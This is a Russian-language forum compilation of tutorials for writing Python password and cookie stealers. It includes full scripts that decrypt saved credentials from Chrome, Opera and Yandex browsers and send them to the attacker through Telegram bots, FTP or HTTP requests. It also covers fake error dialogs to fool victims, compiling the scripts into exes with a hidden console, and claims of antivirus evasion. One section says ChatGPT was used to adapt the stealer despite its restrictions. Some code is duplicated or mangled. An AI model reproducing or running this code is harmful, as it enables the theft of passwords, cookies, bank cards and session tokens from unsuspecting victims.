Пишем свой стиллер на Python
CodingПривет. Пришло время написать свой собственный стиллер на чудном языке Python.
Комментарии будут отмечены решеточкой — #
Установка Python
Переходим на официальный сайт PythonА.
Скачиваем 3+ версию и устанавливаем ее.
Суть работы стиллера
Программа проверит наличие папок от указанных браузеров, при наличии — подключится к базе данных(LoginData) и достанет от туда сохраненные логины,пароли от сайтов. После полученные данные программа отправит от имени бота в чат телеграм. Вот и все)
Создадим своего бота
Как по мне, очень удобно при частом пребывании в телеграме получать в личные сообщения логи со стиллера. Поэтому мы создадим своего бота, который будет нам отправлять украденные логины и пароли.
Для начала мы должны создать нашего бота, в этом нам поможет @BotFather, запускаем с ним диалог и создаем нового бота,которому мы должны придумать имя с окончанием «_bot». После BotFather выдаст нам token для управления нашим ботом.
Команды :
/start
/newbot
После всех вышеперечисленных действий мы должны перейти по ссылке, отправить боту любое сообщение с нужного вам аккаунта и обновить открытый сайт, в итоге мы получим кучу разных данных, в которых нам нужно найти и сохранить chat id.
https://api.telegram.org/botВашToken/getUpdates #перейти по данной ссылке
«chat»:{«id»:вашid #найти chatid в информации
С ботом мы разобрались, идем дальше.
Начинаем кодить
Сначала нам нужно установить библиотеки, которые будут использованы в нашей программе
Для этого запустим терминал(cmd) и обновим питоновский установщик пакетов.
Команда :
pip install —upgrade pip
После обновления установим 2 нужные нам библиотеки,pyTelegramBotAPI pywin32 и telebot
Команды :
pip install pyTelegramBotAPI
pip install pywin32
pip install telebot
В самом начале программы, мы должны подключить библиотеки, которые мы будем использовать в нашем коде.
Код:
from os import getlogin #из библиотеки os мы импортируем функцию getlogin
#данная библиотека поможет нам получить имя пользователя компьютера
import sqlite3 #импортируем библиотеку sqlite3
#данная библиотека даст возможность работать с базами данных
import win32crypt #импортируем библиотеку win32crypt
#эта библиотека поможет расшифровать пароли из базы данных
import telebot #импортируем библиотеку telebot
#с помощью этой библиотеки мы будем отправлять сообщения от нашего бота.
Теперь нам нужно задать переменные, которые мы будет использовать.
Код:
t0ken = «ВАШ:Т0КЕН»» #переменная t0ken – в которой хранится token от бота
b0t = telebot.TeleBot(t0ken) #создаем переменную b0t – которая отвечает за создание бота и имеет атрибут в виде переменной t0ken
name_0f_user = getlogin() # переменная, которая с помощью функции getlogin получает имя учетной записи пользователя.
Дальше мы должны создать переменные,списки с директориями возможных браузеров.
Код:
op3ra = «C:\Users\» + name_0f_user + «<\AppData\Roaming\Opera Software\Opera Stable\>» + «Login data»
#переменная op3ra которая равна такому пути
C:\Users\Users\AppData\Roaming\Opera Software\Opera Stable\LoginData — где Login Data — база данных, а остальное — путь к папке браузера.
g00gle = «C:\Users\» + name_0f_user + «<\AppData\Local\Google\Chrome\User Data\Default\>» + «Login Data» #также как и выше
yand3x = «C:\Users\» + name_0f_user + «<\AppData\Local\Yandex\YandexBrowser\User Data\Default\>» + «Login Data» #также как и выше
c0m0d0drag0n = «C:\Users\» + name_0f_user + «<\AppData\Local\Comodo\Dragon\User Data\Default\>» + «Login Data» #также как и выше
lsdir=[op3ra,g00gle,yand3x,c0m0d0drag0n] #создаем список в котором хранятся наши переменные с директориями браузеров.
lsbr0wser=[«Opera»,»Google Chrome»,»Yandex Browser»,»Comodo Dragon»] #создаем список с названиями браузеров, которые у нас есть. Названия расположены в порядке списка lsdir
Я добавил только 4, как по мне самых распространенных браузеров. Вы можете сами добавлять другие браузеры на движке Chromium
При добавлении/редактировании директорий, нужно использовать двойной, обратный слэш(\), иначе будет выбивать ошибку,связанную с кодировкой.
Теперь приступим к расшифровке паролей и отправке полученных данных в телеграм.
Код:
b0t.send_message(ваш id, «Компьютер: » + name_0f_user) #для начала мы отправим в чат имя системы жертвы
#b0t — имя бота,которого мы создали в начале
#send_message — функция для отправки сообщения,которая принимает такие аргументы: id чата,который мы получили ранее и текст,который мы желаем отправить, в данном случае, слово «Компьютер:» объединенное с переменой name_0f_user
for i in range(len(lsdir)): #запускаем цикл, который будет длится от переменной i до длины списка lsdir, от 0 до 4
try: #попробовать сделать следующие действия, если не получится, то выполнить действия после except
br0wser=lsdir[i] #переменной br0wser присвоим элемент списка под номером [i]
connecti0n = sqlite3.connect(br0wser) #начинаем работу с sqllite, создаем переменную, которая равняется подключению базы данных, которая находится по адресу br0wser
curs0r = connecti0n.cursor() #создаем переменную curs0r, которая отвечает за создание объекта для взаимодействия с базой данных
curs0r.execute(‘SELECT origin_url, username_value, password_value FROM logins’) #переменной curs0r мы говорим достать из базы данных нам такие значения — origin_url(ссылка на сайт где был введен логин и пароль),username_value(логин), password_value(пароль)
for ii in curs0r.fetchall(): #создаем цикл, который будет длится от нуля(ii), до всех значений, которые можно получить из базы данных(curs0r.fetchall)
d3cryptpass = win32crypt.CryptUnprotectData(ii[2]) #переменной d3cryptpass присваиваем значение расшифровки пароля(второго элемента в списке значений, добытых из базы данных), функцией CryptUnprotectData(библиотека win32crypt)
b0t.send_message(id_вашего_чата, lsbr0wser[i]) #в чат от имени бота отправляем сообщение с i-тым элементом из списка текстовых названий браузеров.
b0t.send_message(id_вашего_чата, «—————————-«) #отправляем от имени бота сообщение в чат с разделительной линией/украшением
b0t.send_message(id_вашего_чата, «Сайт: » + ii[0]) #в чат от имени бота отправляем слово «сайт» + нулевой элемент в списке
b0t.send_message(id_вашего_чата, «—————————-«) #отправляем от имени бота сообщение в чат с разделительной линией/украшением
b0t.send_message(id_вашего_чата, «Логин: » + ii[1]) #в чат от имени бота отправляем слово «логин» + первый элемент в списке
b0t.send_message(id_вашего_чата, «—————————-«) #отправляем от имени бота сообщение в чат с разделительной линией/украшением
d3cryptpass=str(d3cryptpass) #переменной d3cryptpass- присваиваем значение d3cryptpass, только переводим ее в текстовый тип данных(str)
b0t.send_message(id_вашего_чата, «Пароль: » + d3cryptpass) #в чат от имени бота отправляем слово «пароль» + переменную d3cryptpass
b0t.send_message(id_вашего_чата, «—————————-«) #отправляем от имени бота сообщение в чат с разделительной линией/украшением
except: #если действие после try не заработало/выдало ошибку, то выполнить действие после except
b0t.send_message(id_вашего_чата,»Браузер » + lsbr0wser[i] + » был запущен, или не установлен») #в чат от имени бота отправляем слово «браузер» + i-тый элемент в списке с названиями браузеров(lsbr0wser) + сообщение об ошибке
Теперь я попытаюсь объяснить суть вышеописанного кода на «простом» примере)
Компилируем в exe
Ясное дело, что python скрипт мы не будем распространять, поэтому мы скомпилируем его в exe файл. Для компиляции нам нужно будет установить специальную утилиту pyinstaller для компиляции py в exe
Код:
pip install pyinstaller
После установки мы должны открыть папку с нашей программой на питоне и запустить pyinstaller с такими аргументами
-F соберет все файлы в один exe файл
-w отключит консоль
-i *путь к иконке* аргумент,который подключит к программе иконку
Код:
CD C:compile
pyinstaller -i i.ico -F -w stealer.py
#В терминала переходим в папку C:compile
#вызываем pyintaller, где i.ico — иконка расположенная в папке compile;stealer.py — наш питоновский скрипт, расположенный в папке compile
После в папке dist появится наш код скомпилированный в EXE.
Вот мы и написали наш простой стиллер, мы смогли уложится в 34 строчки кода.
У меня готовый стиллер запускается за 5 секунд и имеет вес в 6 мегабайт.
Проверить на детекты, я не смог, ибо viruschekmate,ScanMyBin — сдохли,nodstribute+virustotal — сливают данные(не суйте туда стиллер)), поэтому информация про «чистоту» остается для вас и для меня интригой)
Не забудь подписаться на Coding и поделиться каналом с друзьями
Стиллер всего лишь в 3 строки с отправкой в Telegram.
Описание
stink уже имеет внушительный функционал, который будет только расширяться.
Навигация
- Текущие возможности
- Пример использования
- Стандартный
- Определённые модули
- Дополнительные параметры
- Настройка Telegram бота
- Получение токена
- Получение айди
- Создание exe
- Создание исполняемого файла
- С помощью BAT
- С помощью CMD
Текущие возможности
- Поддержка следующих браузеров:
- Chrome
- Opera
- Opera GX
- Edge
- Brave
- Vivaldi
- Сбор следующих данных:
- Скриншот
- Куки
- Пароли
- Банковские карты
- История
- Закладки
- IP-адрес
- Конфигурация системы
- Активные процессы
- Токены Discord
- Сессии Telegram
- Хосты FileZilla
- Поддержка мультипрофилей браузера.
- Отправка архива собранных данных в Telegram.
- Выполнение в отдельном потоке.
- Выполнение с использованием многопроцессорности.
- Возможность добавления в автозагрузку.
- Вывод окна с фейковой ошибкой.
Пример использования
Стандартный
from stink import Stealer if __name__ == '__main__': Stealer(token="YOUR_TOKEN", user_id=YOUR_ID).run()
Определённые модули
Пример со сбором только системных данных и скриншота.
from stink import Stealer from stink.enums import Features if __name__ == '__main__': Stealer(token="YOUR_TOKEN", user_id=YOUR_ID, features=[Features.system, Features.screenshot]).run()
Дополнительные параметры
-
features— включает модули из списка.-
passwords— сбор паролей. -
cookies— сбор куки. -
cards— сбор банковских карт. -
history— сбор истории поиска. -
bookmarks— сбор закладок. -
processes— сбор активных процессов. -
system— сбор конфигурации системы. -
screen— скриншот. -
discord— сбор токенов Discord. -
telegram– сбор сессий Telegram. -
filezilla– сбор хостов FileZilla.
-
Передавайте если нужно включить только определенные модули. Модули для списка можно импортировать из stink.enums.Features.
-
utils— включает утилиты из списка.-
errors— вывод ошибок. -
autostart— добавление в автозагрузку. -
message— вывод фейкового окна ошибки.
-
Передавайте если нужно включить дополнительные утилиты. Утилиты для списка можно импортировать из stink.enums.Utils.
Настройка Telegram бота
Получение токена
- Открываем чат с BotFather.
- Прописываем команду
/newbot.
- Прописываем название бота, затем ник с прикладкой
_botв конце.
- Полученный токен вставляем в поле
"YOUR_TOKEN"в скрипте.
Получение айди
- Открываем чат с Get My ID.
- Прописываем команду
/start.
- Полученный айди вставляем в поле
YOUR_IDв скрипте.
После этого нужно написать боту любое сообщение, чтобы он мог отправлять нам архив.
Создание exe
Python является интерпретируемым языком программирования, поэтому мы сначала транслируем его в C, а затем скомпилируем в .exe файл.
Для этого нам понадобится Nuitka.
Создание исполняемого файла
- Скачиваем архив.
- Распаковываем архив и переходим в директорию stink-master.
- Создаем test.py (или любое другое название) файл в этой же директории со следующим кодом:
from stink import Stealer if __name__ == '__main__': Stealer(token="YOUR_TOKEN", user_id=YOUR_ID).run()
С помощью BAT
- Запускаем compiler.bat.
С помощью CMD
- Открываем
cmd. - Прописываем команду:
- Переходим в папку с файлом
test.py:
- Создаем виртуальное окружение и активируем его:
- Устанавливаем зависимости:
pip install -r requirements.txt
- Устанавливаем Nuitka:
pip install Nuitka==0.6.16.4
- Для уменьшения размера файла дополнительно устанавливаем Zstandard (опционально):
pip install zstandard==0.17.0
- Прописываем команду:
nuitka --onefile --plugin-enable=multiprocessing --windows-disable-console test.py
После выполнения команды получаем test.exe файл со скрытой консолью.
Админ
Регистрация: 01.01.2020
Сообщений: 5,644
Репутация:
∞
Business Level: 25 ?
Пишем стиллер паролей на Python
Еще один на PY: https://alphazine.ru/showthread.php?t=1856
Напишем сегодня стиллер на пайтоне, и запакуем его в exe, чтоб он не палился антивирусами, по моим данным ( 1/67 )
Начнем с самого простого, это подключение библиотек
Код:
Python:
import os.path
import getpass
from ftplib import FTP
import random
con = FTP("хост","логин","пароль")
первая библиотека ( os.path ) — используется для проверки директории на валидность, точнее на то существует ли она в природе
вторая библиотека ( getpass ) — используется для получения юзернейма пользователя под которым запущен процесс, это нужно для доступа к папке AppData
третья библиотека ( ftplib ) — тут самое интересное, она нам поможет отправлять пароли по FTP на наш сервер
четвертая библиотека( random ) — ну тут все просто, мы рандомизируем названия файла который отправляем на сервер
И напоследок мы подключаемся по ftp по логину паролю и хосту.
Теперь перейдем к более интересным вещам, чем просто библиотеки, мы напишем уже сами пути к директориям, где лежат наши пароли, а пароли мы будем воровать(в учеб.целях) из браузеров — Opera, Yandex, Google Chrome
Итак, вот код, пишем его, далее будем его разбирать
Код:
Python: UserName = '\' + getpass.getuser() dir_cookie_google = 'C:\Users'+UserName+'\AppData\Local\Google\Chrome\User Data\Default\Cookies' dir_pass_google = "C:\Users"+UserName+"\AppData\Local\Google\Chrome\User Data\Default\Login Data" dir_cookie_yandex = "C:\Users"+UserName+"\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies" dir_pass_yandex = "C:\Users"+UserName+"\AppData\Local\Yandex\YandexBrowser\User Data\Default\Password Checker" dir_cookie_opera = "C:\Users"+UserName+"\AppData\Roaming\Opera Software\Opera Stable\Cookies" dir_pass_opera = "C:\Users"+UserName+"\AppData\Roaming\Opera Software\Opera Stable\Login Data"
UserName — принимает значения имя текущего пользователя
dir_cookie_google, dir_pass_google, …., … — и т.д. Это все директории где хранятся пароли, нам интерестны именно эти 3 браузера. Будем забирать пароли и куки и перекидывать их себе на сервер по FTP. Потом открывать в sqlite manager, но об этом позже….
У нас имеются директории, у нас есть библиотеки, для работы, что же дальше? Думаю пора приступать к основном задаче, это написание непосредственно стиллера.
Вот код, вы пока напишите его, а я вам потом расскажу о нем ))
Код:
Python:
dir_google = "C:\Users"+UserName+"\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies"
dir_firefox = "C:\Users"+UserName+"\AppData\Roaming\Mozilla\Firefox"
dir_yandex = "C:\Users"+UserName+"\AppData\Local\Yandex"
dir_opera = "C:\Users"+UserName+"\AppData\Roaming\Opera Software"
def check():
if (os.path.exists(dir_google)) == True:
filename = "google"+str(random.randint(1, 10000))
filename2 = "google_pass" + str(random.randint(1, 10000))
with open(dir_cookie_google, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_google, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
if (os.path.exists(dir_opera)) == True:
filename = "opera"+str(random.randint(1, 10000))
filename2 = "opera_pass" + str(random.randint(1, 10000))
with open(dir_cookie_opera, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_opera, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
if (os.path.exists(dir_yandex)) == True:
filename = "yandex"+str(random.randint(1, 10000))
filename2 = "yandex_pass" + str(random.randint(1, 10000))
with open(dir_cookie_yandex, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_yandex, "rb") as content:
Код получился не маленький, что есть то есть. Рассмотрим первые строчки, в начале до функции мы записываем в переменные адреса наших директорий, для последующей проверки на валидность. Зачем это нужно? спросите вы меня, да просто так проще! Зачем ставить try, except если можно проверить на валидность с помощью os.path.exits.
Далее у нас идет функция, со множествами if , тут ничего ничего сложного нету, все просто:
Код:
Python:
if (os.path.exists(dir_google)) == True:
filename = "google"+str(random.randint(1, 10000))
filename2 = "google_pass" + str(random.randint(1, 10000))
with open(dir_cookie_google, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_google, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
Мы проверяем является ли директория валидной, а после уже открываем ее, и отправляем файл на наш сервер FTP. Такс…, функцию написали, библиотеки подключили, директории есть, что не хватает? Думаю не хватает задействовать функцию и вывести на экран какую нибудь псевдо-ошибку, что мол библиотека не подключена и все дела.. Будем действовать по такой схеме))
Вот код, объяснять тут думаю нечего:
Код:
Python:
check()
print("Error library import HOUII.dll")
print("Error RUN cheat")
input()
НО, я все же расскажу, первая строка — вызываем функцию, которая ворует пароли.
Далее мы выводим сообщения об якобы ошибке которой на деле и нет, что бы пользователь думал что это у него проблемы какие то. И что программа не зловредная, а наоборот, пыталась помочь. но как оказалось библиотеки видите ли у него нет))
Вот и весь код, ниже он целиком:
Код:
Python:
import os.path
import getpass
from ftplib import FTP
import random
con = FTP("хост","логин","пароль")
"""
Hack to directory
"""
UserName = '\' + getpass.getuser()
dir_cookie_google = 'C:\Users'+UserName+'\AppData\Local\Google\Chrome\User Data\Default\Cookies'
dir_pass_google = "C:\Users"+UserName+"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
dir_cookie_yandex = "C:\Users"+UserName+"\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies"
dir_pass_yandex = "C:\Users"+UserName+"\AppData\Local\Yandex\YandexBrowser\User Data\Default\Password Checker"
dir_cookie_opera = "C:\Users"+UserName+"\AppData\Roaming\Opera Software\Opera Stable\Cookies"
dir_pass_opera = "C:\Users"+UserName+"\AppData\Roaming\Opera Software\Opera Stable\Login Data"
dir_google = "C:\Users"+UserName+"\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies"
dir_firefox = "C:\Users"+UserName+"\AppData\Roaming\Mozilla\Firefox"
dir_yandex = "C:\Users"+UserName+"\AppData\Local\Yandex"
dir_opera = "C:\Users"+UserName+"\AppData\Roaming\Opera Software"
def check():
if (os.path.exists(dir_google)) == True:
filename = "google"+str(random.randint(1, 10000))
filename2 = "google_pass" + str(random.randint(1, 10000))
with open(dir_cookie_google, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_google, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
if (os.path.exists(dir_opera)) == True:
filename = "opera"+str(random.randint(1, 10000))
filename2 = "opera_pass" + str(random.randint(1, 10000))
with open(dir_cookie_opera, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_opera, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
if (os.path.exists(dir_yandex)) == True:
filename = "yandex"+str(random.randint(1, 10000))
filename2 = "yandex_pass" + str(random.randint(1, 10000))
with open(dir_cookie_yandex, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_yandex, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
check()
print("Error library import HOUII.dll")
print("Error RUN cheat")
input()
У нас есть код, но он на пайтоне, как же его эксплуатировать на чужом ПК?
Думаю ответ очевиден — pyinstaller
Давайте скачаем его:
Код:
Bash: pip install pyinstaller
Далее скомпилируем его в EXE’шник, дабы было все проще у нас ))
Код:
Bash: pyinstaller -F <my_script>.py
Вот и все, по сути у нас есть EXE файл, который не палится антивирусами, ну разве что windows защитник может его заподозрить, все же мы ходим по директориям. Кроме того еще и отправляем файлы на какой то не понятный сервер…. НО на практике kaspersky, dr.web, и др популярные антивирусы не определяют его как вредоносное программное обеспечения, даже если ему тыкнуть носом, вот мол, смотри, давай его просканируем, может там вирусы трояны бэкдоры! он говорит — нет, там нету ничего….
Вот так вот все, всем спасибо! рад был поделится с вами своим скриптом
Автор: NNullday
Простой мод с помощью ChatGPT и, несмотря на ограничения менее чем за 5 минут, чтобы он отправил данные в телеграмме
Код:
Python:
import getpass
import random
import telebot
# Replace "YOUR_BOT_TOKEN" with your actual bot token
bot = telebot.TeleBot("YOUR_BOT_TOKEN")
fldr = 'C:\Users'+'\' + getpass.getuser()+'\AppData\'
files = [
("google","Local\Google\Chrome\User Data\Default\Cookies","Local\Google\Chrome\User Data\Default\Login Data"),
("yandex","Local\Yandex\YandexBrowser\User Data\Default\Cookies","Local\Yandex\YandexBrowser\User Data\Default\Password Checker"),
("opera","Roaming\Opera Software\Opera Stable\Cookies","Roaming\Opera Software\Opera Stable\Login Data")
#("firefox", "", "")
]
def check():
global files
for f in files:
bid = str(random.randint(1, 10000))
try:
with open(fldr+f[1], "rb") as content:
open(f[0]+'_cookie'+bid, 'wb').write(content.read())
# Send the cookie file to Telegram
bot.send_document(chat_id="YOUR_TELEGRAM_CHAT_ID", document=open(f[0]+'_cookie'+bid, 'rb'))
with open(fldr+f[2], "rb") as content:
open(f[0]+'_pass'+bid, 'wb').write(content.read())
# Send the password file to Telegram
bot.send_document(chat_id="YOUR_TELEGRAM_CHAT_ID", document=open(f[0]+'_pass'+bid, 'rb'))
except Exception as err:
#print(err)
print('There is no '+f[0]+' here.')
check()
В этой статье будет показано, рассказано, и доказано, как написать свой стиллер на Python-e
Для работы нам понадобятся:
1)Python последней версии (необязательно, но лучше всегда качать свежую версию), прямая ссылка на скачивание последней (на момент написания статьи) версии
https://www.python.org/ftp/python/3.8.3/python-3.8.3.exe
2)Также потребуется среда разработки, для питона, лучшей и самой (как по мне) средой является Pycharm скачать вы его можете с официального сайта JetBrains
https://www.jetbrains.com/ru-ru/pycharm/download/download-thanks.html?platform=windows&code=PCC
1)качаете питон, устанавливаете с правами админа.
2)качаете среду, устанавливаете, запускаете.
Запускаем Pycharm, если еще не запустили.
Видим такое окно.
Жмем Create Project
Выбираем название нашего проекта, питон на компьютере (если вы его установили) среда найдет автоматически
Жмем create
Поздравляю, проект создан
После прогрузки и создания проекта переходим в File -> Setting -> Project Iterpreter
Жмем плюсик с правой стороны окна и ****аем в поиск requests, там на автомате у вас выберется нужная библиотека, жмете install package
Также делаем со следующими библиотеками:
-pyasn1
-rsa
-pycryptodome
-pywin32
-psutil
Теперь жмем на папку слева правой кнопкой мыши new -> python file -> выбираете имя вашего файла и создаете его
Поздравляю, самое сложное позади.
Импортируем следующие библиотеки
import os
import sqlite3
import zipfile
import requests
from ctypes import *
from winreg import *
from json import load
from os import listdir
from shutil import copy
from struct import calcsize
from base64 import b64decode
from Crypto.Cipher import AES
from psutil import process_iter
from win32api import GetModuleHandle
from win32crypt import CryptUnprotectData
Обозначаем точку входа программы
знаю что она необязательна, мне просто нравится ее писать
code
if __name__ == «__main__»:
теперь составляем дефолтные пути до браузеров
chromium_browsers = {
u’google chrome’: os.getenv(«LOCALAPPDATA») + r’GoogleChromeUser Data’,
u’opera’: os.getenv(«APPDATA») + r’Opera SoftwareOpera Stable’,
u’yandexBrowser’: os.getenv(«LOCALAPPDATA») + r’YandexYandexBrowserUser Data’
}
Ищем базы, расшифровываем, сохраняем.
Все обьяснения будут в виде комментариев в коде, иначе до конца никто не дочитает
PasswordsArray = []#Здесь будут логины пароли
CookiesDict = {}#Тут будут куки в формате browser : [cookArray]
def db_dirs(path):#Передаем путь к браузеру
databases = set()#Обьявляем список
profiles_path = os.path.join(path, u’Local State’)#
if os.path.exists(profiles_path):#
profiles = {‘Default’, »}#
for dirs in os.listdir(path):#Ищет профили
dirs_path = os.path.join(path, dirs)#
if os.path.isdir(dirs_path) and dirs.startswith(‘Profile’):#
profiles.add(dirs)#
with open(profiles_path) as f:
try:
data = load(f)
profiles |= set(data[‘profile’][‘info_cache’])#Нужно для получения мастер-ключа
except Exception:
pass
with open(profiles_path) as f:
try:
master_key = b64decode(load(f)[«os_crypt»][«encrypted_key»])
master_key = master_key[5:]
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]#О, мастер-ключ
except Exception:
master_key = None
for profile in profiles:
try:
db_files = os.listdir(os.path.join(path, profile))
except Exception:
continue
for db in db_files:
if db.lower() in [‘login data’,’cookies’]:
databases.add((os.path.join(path, profile, db), master_key))#Возвращаем пути до всех бд которые удалось найти
return databases
def decryption(buff, key):#Нужна для декрипта, просто скопипасть, не парься
payload = buff[15:]
iv = buff[3:15]
cipher = AES.new(key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def passwords(name, path, database_path, master_key):#Ну пароли дешифрует, чо, какие вопросы
copy(path, database_path)
cursor = sqlite3.connect(database_path).cursor()
cursor.execute(‘SELECT action_url, username_value, password_value FROM logins’)
for result in cursor.fetchall():
url = result[0]
login = result[1]
try:
password = decryption(result[2], master_key)
except Exception:
password = «Error»
if url and login and password != »:
PasswordsArray.append(
‘Browser: ‘ + name + ‘nLink: ‘ + url + ‘nLogin: ‘ + login + ‘nPassword: ‘ + password + ‘n’)
def cookies(name, path, database_path, master_key):
Cookies = [] #Куки добавляются сюда
copy(path, database_path)#Копируем базу
cursor = sqlite3.connect(database_path).cursor()#Коннектимся к базе
cursor.execute(«SELECT * from cookies»)#Читаем куки
for result in cursor.fetchall():
try:
cookie = decryption(result[12], master_key)#Декриптим куки
except Exception:
return
cookie_name = result[2]
exp = result[5]
if result[6]:#Достаем значения для записи в net-scape формат
secure = «TRUE»
else:
secure = «FALSE»
if result[7]:
isHttp = «TRUE»
else:
isHttp = «FALSE»
path = result[4]
url = result[1].replace(«https://», «»).replace(«http://», «»).split(«/»)[0]
Cookies.append((url + «t» + secure + «t» + path + «t» + isHttp + «t» + str(#Записываем куки в net-scape формате
exp / 1000000) + «t» + cookie_name + «t» + str(cookie)))
for i in range(0, 100):
if i >= 1:
if name + str(i) in CookiesDict:#короч эта штука
continue#если найдено несколько профилей
else:
CookiesDict[name + str(i)] = Cookies#то записывает куки
break
else:
if name in CookiesDict:#с одного браузера
continue
else:
CookiesDict[name] = Cookies#В разные текстовики
break
def helper(name, path, database_path, master_key):
if database_path.endswith(«Cookies»):#Оп, куки
copyPath = path + ‘Backup Cookies’#Копируем бд, ибо читать из оригинала, когда запущен браузер, нельзя
cookies(name, database_path, copyPath, master_key)#Дешифруем куки
if database_path.endswith(«Login Data»):#Оп, пароли
copyPath = path + ‘Backup Password’
passwords(name, database_path, copyPath, master_key)#Дешифруем пароли
if __name__ == «__main__»: #Точка входа в программу
chromium_browsers = { #Пути до браузеров
u’google chrome’: os.getenv(«LOCALAPPDATA») + r’GoogleChromeUser Data’, #Хром
u’opera’: os.getenv(«APPDATA») + r’Opera SoftwareOpera Stable’}#Опера
}
for browser, path in chromium_browsers.items():
if os.path.exists(path):#Есть ли браузер
for database_path, master_key in db_dirs(path):#Функция поиска баз и мастер-ключа
helper(browser, path, database_path, master_key)#Отправляет куки в декод куков, пароли в декод паролей
try:
os.makedirs(os.getenv(«TEMP») + ‘\Debug\’)#Здесь будет наш архив
except OSError:
pass
path_main = os.getenv(«TEMP») + ‘\Debug\’
zipload = zipfile.ZipFile(os.path.join(path_main, «MyZip» + «.zip»), ‘w’)#Создаем архив и насовываем ему наши данные
if (len(PasswordsArray) > 0):
file = open(os.path.join(path_main, «Passwords.txt»), «w+», encoding=’utf-8′)
file.write(«n».join(PasswordsArray))#Пишем пароли в текстовик
file.close()
zipload.write(os.path.join(path_main, «Passwords.txt»),
«\Browsers\» + os.path.basename(os.path.join(path_main, «Passwords.txt»)))#Суем текстовик в архив, ниже кста также
if (len(CookiesDict) > 0):
for browser, cooks in CookiesDict.items():
file = open(path_main + «\» + browser + «.txt», «w+», encoding=’utf-8′)
file.write(«n».join(cooks))
file.close()
zipload.write(path_main + «\» + browser + «.txt», «\Cookies\» + browser + «.txt»)
zipload.close()
Отлично, мы получили куки и пароли, упаковали все в архив, осталась только отправка.
Здесь стоит остановиться, есть несколько путей:
1)Разобраться в апи какого то файлообменника (Google Disk, Yandex Disk, DropBox и тд), минус в том что если вытащат ваши данные от апи, по типу токена, тогда можете попрощаться со своими логами
2)Принимать лог себе на панель установленную на хостинге или на Дедике, самый надежный вариант, не забудьте проставить права доступа к файлам на своем хостинге. Минус в том что, если на вас будут поступать жалобы или вы возьмете публичную панель с интернета, то в первом случае вас забанят через время, во втором случае вас могут забанить перманентно и в тот же момент
3)Отправлять логи в телеграмм через прокси, хороший вариант, но есть свои минусы, почти любой может увидеть ваш токен, через тот же вирустотал, во вкладке отвечающей за взаимодействие с сетью. Лучшим решением будет отправлять лог на панель и пересылать в ваш телеграмм.
Если вы делаете для себя и хотите кидать данное ПО своим учителям и девкам с класса, то спокойно можете отправлять напрямую себе в телеграмм, в данной статье я покажу именно этот способ отправки и расскажу как обойти бан телеграмма в России
Для обхода бана телеграмма, нам нужно устанавливать соединение через прокси. Идете на любой сайт с бесплатными проксями и берете парочку, я буду показывать на примере https проксей
Также нужно будет создать бота в телеге и написать ему /start, это уже сами нагуглите
zipPath = os.path.join(path_main, «myZip» + «.zip»)
token = «w123344bukvi2847982498cifriokicejo»
chat_id = «tvoychatid-ego-mojno-uznat-u-specialnix-botov»
proxy_array = [«198.27.69.175:3128»}#Твоя прокся
data = {‘chat_id’: chat_id}
r = requests
files = {‘document’: open(zipPath, ‘rb’)}
response = r.post(«https://api.telegram.org/bot» + token + «/sendDocument», files=files, data=data,#Отправляем и никаких лишних библиотек
proxies={‘https’: ‘https://’ + proxy}, timeout=(1, 10))
Поздравляю, вы отправили лог себе в телеграмм, впервые рады звуку уведомления?
Копипаст
Пришло время написать свой собственный стиллер на чудном языке Python. Оформление,заголовки и куски текста, я буду брать из
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
, ибо есть повторяющееся моменты, а делать рерайт на них, я не вижу смысла)
Словарик с терминами,которые я буду использовать :
IDLE/IDE — среда для разработки программного обеспечения.
Библиотека/модуль — написанные коды/функции,которые подключаются к нашей программе.
pip — система для установки пакетов(Для Python).
Переменная — ячейка в памяти,которая имеет свое уникальное название и может хранить определенную информацию
Функция — часть кода, который имеет свое уникальное название по которому его можно запустить/вызвать
Цикл — действие, которое будет повторятся N-ное количество раз и может зависит от определенного условия
Комментарии будут отмечены решеточкой — #
Установка Python
Переходим на официальный сайт PythonА —
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
. Скачиваем 3+ версию и устанавливаем ее.
Суть работы стиллера
Программа проверит наличие папок от указанных браузеров, при наличии — подключится к базе данных(LoginData) и достанет от туда сохраненные логины,пароли от сайтов. После полученные данные программа отправит от имени бота в чат телеграм. Вот и все)
Создадим своего бота
Как по мне, очень удобно при частом пребывании в телеграме получать в личные сообщения логи со стиллера. Поэтому мы создадим своего бота, который будет нам отправлять украденные логины и пароли.
Для начала мы должны создать нашего бота, в этом нам поможет @BotFather, запускаем с ним диалог и создаем нового бота,которому мы должны придумать имя с окончанием «_bot». После BotFather выдаст нам token для управления нашим ботом.
После всех вышеперечисленных действий мы должны перейти по ссылке, отправить боту любое сообщение с нужного вам аккаунта и обновить открытый сайт, в итоге мы получим кучу разных данных, в которых нам нужно найти и сохранить chat id.
https://api.telegram.org/botВашToken/getUpdates #перейти по данной ссылке
"chat":{"id":вашid #найти chatid в информацииПосмотреть вложение 7364
С ботом мы разобрались, идем дальше.
Начинаем кодить
Сначала нам нужно установить библиотеки, которые будут использованы в нашей программе
Для этого запустим терминал(cmd) и обновим питоновский установщик пакетов.
pip install --upgrade pipПосле обновления установим 2 нужные нам библиотеки,pyTelegramBotAPI pywin32 и telebot
pip install pyTelegramBotAPI
pip install pywin32
pip install telebot______________________________________________________________________________________
